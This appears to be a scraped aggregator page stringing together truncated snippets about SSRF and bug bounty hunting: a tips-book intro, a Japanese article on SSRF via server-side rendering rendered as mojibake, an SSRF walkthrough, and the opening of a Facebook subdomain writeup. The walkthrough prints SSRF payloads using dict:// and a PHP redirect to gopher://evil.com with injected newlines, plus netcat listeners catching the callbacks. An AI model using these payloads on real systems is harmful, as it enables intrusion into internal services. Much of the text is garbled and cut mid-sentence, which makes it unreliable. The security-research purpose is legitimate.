Hi , This book is a collection of "BugBounty" Tips tweeted / shared by community people. It includes the tweets I collected over the past from Twitter , Google and Hastags and chances that few tips may be missing. I have categorized tips against each vulnerability classification and "will be updating" regularly. Each tweet has link to original tweet to read about others replies / comments. Huge "T
ãªãã§ã³ã·ãã»ãã¥ãªãã£é¨ã®å±±å´ã§ãããµã¼ããµã¤ãã¬ã³ããªã³ã°ï¼SSRï¼ã®å°å ¥ã«ãã£ã¦SSRFãçºçããåé¡ãè¦ã¤ããæ©ä¼ããã£ããããæ¬è¨äºã§ã¯å®ä¾ã交ããªããç´¹ä»ãããã¨æãã¾ãã ãµã¼ããµã¤ãã¬ã³ããªã³ã°ï¼SSRï¼ã¨ã¯ï¼ æ¬è¨äºã§æ±ãSSRã¨ã¯ããµã¼ãä¸ã§HTMLãåºåãããã¨ããæãã¦ãã¾ãããã ãerbãjspã®ãããªãã³ãã¬ã¼ãããHTMLãåºåããã®ã¨ã¯ç°ãªããä¸è¬çã«ã¯ä»¥ä¸ã®ããã«ã¯ã©ã¤ã¢ã³ããµã¤ãã¬ã³ããªã³ã°ï¼CSRï¼ã®æèã§ä½¿ããããã¨ã主ã§ãã è¿å¹´ã®Vue.jsãReactã代表ãããããªWebããã³ãã¨ã³ããã¬ã¼ã ã¯ã¼ã¯ã¯ãã©ã¦ã¶ä¸ã§åçã«DOMããªã¼ãæ§ç¯ãã¦ç»é¢ãæç»ï¼CSRï¼ããã®ã主æµã¨ãªã£ã¦ãã¾ããããã«ãã£ã¦ãã¼ã¸é·ç§»ãæã¾ãã¦ã¼ã¶ä½é¨ã®ããã·ã³ã°ã«ãã¼ã¸ã¢ããªã±ã¼ã·ã§ã³ï¼SPAï¼ãä½ããã¨ãã§ããã¨ããã¡ãªãããããã¾ãã ãã ãåç´ãªSPAã«ã¯ãã¡
http://safebuff.com/ssrf.php?dict://attacker:11111/ evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 // http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php <?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?> evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Conne
Hello World â¤ï¸, Facebook is the largest social networking site in the world and one of the most widely used. I have always been interested in testing the security of Facebook. During the sub domain enumeration, Iâve got a sub domain which is âhttps://m-nexus.thefacebook.com/". It redirects me to âhttps://m-nexus.thefacebook.com/servlet/mstrWebAdmin" observe below screenshot: I quickly Google keywo
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}